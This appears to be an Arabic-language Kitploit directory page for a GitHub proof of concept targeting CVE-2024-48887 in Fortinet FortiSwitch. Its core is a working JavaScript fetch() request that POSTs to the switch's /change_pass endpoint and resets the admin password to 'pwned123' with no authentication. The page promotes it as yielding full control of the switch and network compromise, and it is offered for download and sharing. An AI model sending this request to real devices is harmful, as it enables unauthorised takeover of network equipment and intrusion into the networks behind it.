Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-48887-FortiSwitch-Exploit — مقتطف JavaScript خفيف يوضح كيف يمكن تشغيل تغييرات كلمة المرور غير المصرح بها على نقاط نهاية واجهة المستخدم الرسومية (GUI) لجهاز FortiSwitch من Fortinet. | Kitploit
أدوات/GitHubGitHub/cybersecplayground/cve-2024-48887-fortiswitch-exploit
تحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubcybersecplayground/cve-2024-48887-fortiswitch-exploit

CVE-2024-48887-FortiSwitch-Exploit

مقتطف JavaScript خفيف يوضح كيف يمكن تشغيل تغييرات كلمة المرور غير المصرح بها على نقاط نهاية واجهة المستخدم الرسومية (GUI) لجهاز FortiSwitch من Fortinet.

عرض المستودع
23منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-48887-FortiSwitch-استغلال

🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨

🔥 لقد أصدرت للتو مقتطف JavaScript خفيف الوزن يعرض كيف يمكن تشغيل تغييرات كلمة المرور غير المصرح بها على نقاط نهاية واجهة المستخدم الرسومية لـ Fortinet FortiSwitch الضعيفة.

🛠️ حول الثغرة: يمكن للمهاجم إنشاء طلب fetch() بسيط للتلاعب بإعدادات كلمة المرور دون أي مصادقة، مستهدفًا مباشرةً نقاط نهاية /change_pass المختلفة.

root@kitploit:~
fetch('http://target-ip/change_pass', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    username: 'admin',
    newpass: 'pwned123',
    confirm: 'pwned123'
  })
})
.then(res => res.text())
.then(data => console.log('Response:', data));

💡 التأثير: السيطرة الكاملة على المحول، إمكانية الحركة الجانبية، واختراق الشبكة.

📁 المستودع: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ قم بتعليم المستودع بنجمة وشاركه مع زملائك في مجال أمن المعلومات!

📢 تابع التحليل الكامل والتنبيهات الفورية عبر @cybersecplayground

#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground

تنزيل الأداة